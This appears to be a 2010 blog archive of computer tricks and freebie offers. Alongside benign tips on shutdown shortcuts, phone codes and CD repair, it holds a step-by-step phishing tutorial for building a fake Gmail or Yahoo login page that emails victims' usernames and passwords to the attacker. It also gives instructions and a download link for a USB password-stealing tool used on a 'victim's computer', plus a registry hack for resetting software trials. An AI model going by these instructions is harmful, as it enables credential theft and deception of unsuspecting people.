Friday, 31 December 2010
1) Connect your pen drive to your PC [pen drive should be at least 1 GB or if you having 4 GB then its better]
2) Allow PC what he is supposed to do,let system to detect pen drive.
3) After your PC finished with its detection work,you have to do some little
4) Right click on the My Computer and select the properties
5) Goto advanced and then performance setting then advanced then
6) Select pen drive and click on custom size " Check the value of space available "
7) Enter the same in the Initial and the Max columns
" You just used the memory of the PenDrive as a Virtual Memory "
8) Now restart your pc and enjoy your fast and super system
Friday, 31 December 2010 by Unknown · 0
Instructions:
1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.
2.Insert the USB in your victim’s computer.
3.View folder “dump” to see the passwords.
Download Here
Password: www.dl4all.com
by Unknown · 0
This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”
Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you
The process of Hacking anyone’s id using fake login pages is known as Phishing
Now let’s learn how to create your very own fake login page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url ofthe file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.
by Unknown · 0
Thursday, 30 December 2010
Saint-Gobain glass presents Glass is Green where you can know how Glass can be helpful in making our environment green and healthy.They are giving free customized 2011 Green calendar where the calendar will be customized with your name to all those who post their green resolution to their facebook fan page or twitter page.After you post your green resolution, you need to send your details at design@glassisgreen.com to Claim your customized Green Calendar.
To know more about this, you can also visit here.
Thursday, 30 December 2010 by Unknown · 0
Wednesday, 29 December 2010
Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller. All you need for this is only the first 4-digit of the mobile number. In this Wiki page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.
If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this link from Numbering Plans. Using this link, you can trace any number in the world.
By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So if you’re in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you!
Link for Indian Mobile number finder from Wikipedia
Link for International Mobile number finder
Wednesday, 29 December 2010 by Unknown · 0
Click here to request The Windows 7 Guide: From Newbies to Pros Complimentary Guide.
by Unknown · 0
Tuesday, 28 December 2010
Click Here to Grab Your Free Copy
Tuesday, 28 December 2010 by Unknown · 0
Monday, 27 December 2010
1.Click “ADD TO BASKET”
2.Click “Check Out Now” (bottom right)
3.Select “Free trial subscription only”
4.Enter and submit your details.
Click here to request a free 4 month trial subscription to New Internationalist.
Monday, 27 December 2010 by Unknown · 0
Saturday, 25 December 2010
Request your free Adventist Mission DVD today.
Click Here to Get: Adventist Mission DVD
Saturday, 25 December 2010 by Unknown · 0
Create One-Click Shutdown and Reboot Shortcuts
First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "Ill be back m8 ;)!"
Switch
What it does
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC.
by Unknown · 0
Friday, 24 December 2010
Get free live score in mobile when you need.
Just dial the number
08030050055.
No balance deduct.
After u call your call will dissconect in one ring.
And after some time you get live score as sms for free.
Friday, 24 December 2010 by Unknown · 0
Fill out the online form to request yours free of charge today.
Click Here to Get: Dr. Utley's Computer Bible Commentary CD-ROM
by Unknown · 0
Thursday, 23 December 2010
HydroPeptide takes the most advanced, scientifically-proven skin care elements and simplifies your beauty routine with the SIMPLY AGELESS SKIN KEY, giving you a complete map to beautiful, healthy, ageless skin. The multifaceted HydroPeptide takes the hassle out of your already hectic and complicated life. Whatever your skin type and whatever your concern, HydroPeptide supplies the latest high-tech vital ingredient technologies that deliver youthful, healthy skin.
"Like" them on Facebook and complete the form for three free samples of their products.
Click Here to Get: 3 Free HydroPeptide Skincare Samples
Thursday, 23 December 2010 by Unknown · 0
Tuesday, 21 December 2010
The above screenshot shown windows 7 original Product ID and the below one shows hacked Product ID.
As you can Observe in the above screenshot that instead a windows product ID you can see my name. To do this simple hack follow the easy steps below.
1) Go to START and RUN and Enter the following command REGEDIT
2) Open the regedit and navigate to the following key path
HKey_Local_Machine\Software\Microsoft\Windows NT\Current Version
3) Highlight on the current version and On the Right hand side you can see ProductID Listed under the heading name.
4) Double click on the Product Id a pop up box will come up and you can see the product id of windows some what like this 76125-623-557896-27654. Now change it to your desired name and click on OK
5) Done! Now you can see the Product Id of desired choice which will never again alter you for a key. This is applicable for all windows versions like windows 7, windows xp, windows vista.
6) Enjoy Hacking!
Tuesday, 21 December 2010 by Unknown · 0
Sunday, 19 December 2010
Concrete Wave magazine is 100% skateboarding. They are printing a few gazillion stickers and they'd like your help in giving them away. If you'd like a bundle of free Concrete Wave stickers, fill out their form. They will not harass you or send you junk email. It's 100% free and available while quantities last. Once your sticker package arrives, start handing out stickers to friends and fellow skaters. NOTE: THIS OFFER IS OPEN TO ANY FAN OF CONCRETE WAVE, NO MATTER WHERE THEY LIVE. Yes, even you, tiny Liechtenstein. Their Facebook page to become a fan: http://www.facebook.com/pages/Concrete-Wave-Magazine/148743961536#!/pages/Concrete-Wave-Magazine/148743961536?v=wall
|
Sunday, 19 December 2010 by Unknown · 0
Saturday, 18 December 2010
- Click Start
- Click on Run
- Type regedit and press enter.
- Registry Window Would get open.
- Now navigate to the following keys and delete the keys.
- HKEY_LOCAL_MACHINESOFTWAREHKEY_LOCAL_M...
- HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROL...
- Both the above keys will have a linked to the program delete that key only.
- Reboot your PC and enjoy.
Reinstall the program. This is the easiest method, but highly likely that it won’t work mostly on current modern software, as the expiry check algorithm getting sophisticated by keeping the expiry information on started using date and days allowed for try use plus days left in the trial in the registry or in a randomly named file.
Saturday, 18 December 2010 by Unknown · 0
Hi, i found many queries and difficulties on this forums regarding installing games in china mobiles, so i decided to share tip that can help you to install games on your any China Mobile phone. Here it is:
- Download the attached ZIP file with this post and unzip it anywhere on your hard drive.
- The folder FOR THE CHINA MOBILE SD, contains the following folders, as shown in the image-
- Replace these folders in the Chinese cell phone SD, memory SD did not have these folders.
- Restart the phone and type the following code: * # 66 * #, waiting to come out a window in that window where it says you are going to ECHO LOOP CYCLE ECO Or press the switch or ON (green button).
- Quit selling out pressing the button or cancel call.
- Type the following code: * # 220 807 #. Done.
If the Chinese phone supports NES games, be sure that NES games will appear in the SD. The games folder on the SD memory is Mytrhoad / NES.
Download Link -
Game solution.rar
by Unknown · 0
Here is a simple trick on how to remove recycle bin from your desktop. a simple editing at gpedit.msc does the trick . In gpedit: gpedit.msc * Go to User Configuration--->Administrative Templates--->Select Desktop * On the Right hand side/pane try to find " Remove Recycle Bin icon on the desktop " * Once you find it,simply double click on it to Enable it. * Done, no more Recycle bin |
by Unknown · 0
China Mobile Secret Codes Default user code : 1122, 3344, 1234, 5678 Engineer mode : *#110*01# Factory |
mode : *#987# Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200 Restore factory settings : *#987*99# LCD contrast : *#369# Software version : *#800# Software version : *#900# Set default language : *#0000# Send Set English language : *#0044# Send Set English language (new firmware) : *#001# Send Default user code : 1122, 3344, 1234, 5678 List of secret codes to reset your chinese mobile phones. *#66*# Set Factory Mode CONFIRMED *#0033# + Send : Set Language to French CONFIRMED *#8375# Show Software Version CONFIRMED *#1234# A2DP ACP Mode CONFIRMED *#1234# A2DP INT Mode CONFIRMED *#0000# + Send : Set Default Language CONFIRMED *#0007# + Send : Set Language to Russian CONFIRMED *#0034# + Send : Set Language to Spanish CONFIRMED *#0039# + Send : Set Language to Italian CONFIRMED *#0044# + Send : Set Language to English CONFIRMED *#0049# + Send : Set Language to German CONFIRMED *#0066# + Send : Set Language to Thai CONFIRMED *#0084# + Send : Set Language to Vietnamese CONFIRMED *#0966# + Send : Set Language to Arabic CONFIRMED *#800# make Etel E10 model displaying message BT power on. But on display it dont resemble the bluetooth power on icon.(actually t makes BT stuck, but after restarting t becomes normal <tested by me>) More codes to reset Chinese mobile phone *#77218114# *#881188# *#94267357# *#9426*357# *#19912006# *#118811# *#3646633 |
by Unknown · 0
There are different ways by which you can hack into someone else computer.One method is using trojan.Trojan ia malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user’s computer system.
etc… There are many ways how trojan is installed in someone computer..
Software downloads
by Unknown · 0
by Unknown · 0
Prevent a scratched CD comes first
Care for your CD’s or dvd’s by handling and storing them correctly. Even your sticky fingerprints can damage layers of a cd’s surface. For extra precious cd’s you should definitely create a backup copy of it. If you do this there is no need to read the rest of this article.Home Repair of your scratched cd’s or dvd’s
When I have a problem with a cd the first thing I do is try to make a backup copy of it. It sometimes depends on the quality of your burner as to whether it can read your disk or not. You should slow down the read and burning speed so your burned gets an accurate image of the disk. I had lots of luck with Clone Cd.The next thing I do is take my disc to my local video rental place where they restore and polish my cd’s for free because I am a member. Some places charge money, but it won’t be much.
The other alternative is to give it a clean yourself. Clean with soapy water and a soft cloth if it is just dirty. Only wipe from the center of the cd towards the outer edge. Do not towel dry, leave to air dry, never in the sun.
If there are scratches there are two options on how to repair CD’s.
To polish the scratches out in the CD
1. To polish a cd you should use a soft cloth with some water and toothpaste. This will work as a mild abrasive. Do not rub too hard, be gentle, always from the center and out. Make sure you clean all the toothpaste off by rinsing with water and air drying before testing it in your cd drive.To polish the scratches out and then fill them
2. To polish and fill the most common thing people use is brasso. Follow the instructions on the bottle for safety and again, be gentle. Wash or polish off and air dry. The best way to save your disks is definitely prevention. Go and make backups of your favorite disk right now..It will save you the headacheby Unknown · 0
For those who would like to do something about making human rights a fact for all mankind, this information package provides the tools to do so. Containing precise steps to raise awareness of human rights in any community, it further includes a DVD of 30 public service messages illustrating each of the articles of the Universal Declaration of Human Rights. The DVD features the award-winning UNITED music video-a street-savvy, multi-ethnic, five minute film conveying the power of human rights awareness. Also included is the What Are Human Rights booklet bringing the Declaration to life, and making each of the rights easy to understand.
by Unknown · 0